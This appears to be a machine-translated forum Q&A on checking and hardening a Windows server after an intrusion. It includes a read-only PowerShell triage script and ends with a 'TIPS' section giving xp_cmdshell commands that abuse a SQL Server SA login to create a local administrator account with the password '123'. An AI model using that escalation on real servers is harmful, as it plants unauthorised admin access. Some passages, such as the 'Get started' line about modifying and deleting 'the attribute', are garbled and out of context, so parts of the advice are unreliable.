Server security checks and protection (incomplete)

Source: Internet
Author: User

Q: The server shows signs of intrusion. Asking for security settings.

Recently, my server seems to be abnormal. I often find that some programs are opened or some errors are prompted when I log on remotely. Check that the Guest account is set to admin, another account is associated with me. This should have been infiltrated. I have closed the Guest account and have any good security settings.

 

Guest has been elevated to admin?

Obviously.

If you have physical access to the server, you can disconnect it from the network and perform a thorough check.

Step 1: Check the account

It is best to check whether there are any hidden accounts.

Delete every account whose password you do not know.

Step 2: View processes and services

If there are suspicious processes, do not kill them right away (you don't know whether killing them will cause even more trouble!).

Check msconfig for unknown programs that run at startup.

Check the system services for any extra service entries.

It is best to use a rootkit detection tool to check for registry entries or programs that have been hidden with rootkit techniques.

This step is only to understand the situation.

Step 3: Check the network connection

Network connectivity is one of the most important functions of the server and something an intruder must have, so it is treated separately.
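
A read-only pass over Steps 1 to 3, as an added example that is not part of the original post. It assumes Windows PowerShell 5.1 or later on a standalone or member server, run from an elevated prompt; the output folder name is a placeholder.

```powershell
# Added example: read-only triage for Steps 1-3. Nothing is killed, deleted or changed.
# Assumption: Windows PowerShell 5.1+, elevated prompt. $OutDir is a placeholder path.
$OutDir = Join-Path $env:TEMP ('triage-{0:yyyyMMdd-HHmmss}' -f (Get-Date))
New-Item -ItemType Directory -Path $OutDir | Out-Null

# Step 1: accounts. S-1-5-32-544 is the built-in Administrators group and the
# built-in Guest account always has RID 501, whatever either has been renamed to.
$users  = Get-LocalUser | Select-Object Name, Enabled, SID, LastLogon, PasswordLastSet
$admins = Get-LocalGroupMember -SID 'S-1-5-32-544' |
    Select-Object Name, ObjectClass, PrincipalSource, SID
$guest  = $users | Where-Object { $_.SID.Value -like 'S-1-5-21-*-501' }
if ($guest -and $guest.Enabled) { Write-Warning "Guest ($($guest.Name)) is enabled" }
if ($guest -and ($admins.SID.Value -contains $guest.SID.Value)) {
    Write-Warning "Guest ($($guest.Name)) is a member of Administrators"
}
# Account names ending in '$' are omitted from 'net user' output, so list them explicitly.
$users | Where-Object { $_.Name -like '*$' } |
    ForEach-Object { Write-Warning "Account hidden from 'net user': $($_.Name)" }

# Step 2: logon startup commands, auto-start services and running processes.
$startup  = Get-CimInstance Win32_StartupCommand | Select-Object Name, Command, Location, User
$services = Get-CimInstance Win32_Service | Where-Object { $_.StartMode -eq 'Auto' } |
    Select-Object Name, DisplayName, State, StartName, PathName
$procs    = Get-CimInstance Win32_Process |
    Select-Object ProcessId, ParentProcessId, Name, ExecutablePath, CommandLine

# Step 3: listening and established TCP connections, mapped to the owning process.
$nameByPid = @{}
foreach ($p in $procs) { $nameByPid[[int]$p.ProcessId] = $p.Name }
$conns = Get-NetTCPConnection -State Listen, Established |
    Select-Object State, LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess,
        @{ Name = 'ProcessName'; Expression = { $nameByPid[[int]$_.OwningProcess] } }

# Save everything so it can be compared against a known-good baseline.
$report = @{ users = $users; admins = $admins; startup = $startup
             services = $services; processes = $procs; connections = $conns }
foreach ($k in $report.Keys) {
    $report[$k] | Where-Object { $_ } |
        Export-Csv -Path (Join-Path $OutDir "$k.csv") -NoTypeInformation
}
Write-Output "Triage written to $OutDir"
```

Run it before changing anything on the machine, and copy the output folder off the server for review.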

Get started

This parameter is used to modify, delete, and delete the attribute.

 


Note: if you are working over remote control, you must be careful. You cannot see the machine while it shuts down or restarts, and there is no guarantee that you will be able to get back into the system. Hehe.

------------

I don't know about you.

Here we will talk about protection:

1: A firewall is a must, and it must be configured with appropriate rules.

2: It is best to install good anti-virus software with strong active defense. (Set up the trusted programs.)

3: Set permissions. For example, do not allow anyone except the super administrator to delete things on drive C. You can, however, keep some accounts that have the right to modify, equivalent to the Power Users group. Hehe, you need to configure this yourself.

I won't go into the rest, such as timely patching and updating the virus database. If I keep the logs, I will publish an article.


If you have any questions, please continue the discussion.

 

 

When reprinting, please credit the source: http://blog.csdn.net/clin003

---------------------------

 

TIPS: using SQL Server to elevate local permissions

If you have an SQL Server administrator (SA) account and can log on, try the following method:

-- Connect to SQL Server as an administrator and run the following commands in Query Analyzer:

-- Add a user
exec master.dbo.xp_cmdshell 'net user clin003 123 /add'

-- Add the user to the Administrators group
exec master.dbo.xp_cmdshell 'net localgroup administrators clin003 /add'

In this way, you create an administrator user named clin003 with a password of 123 on the server. Log on to the system as that user and change the password of your original administrator.
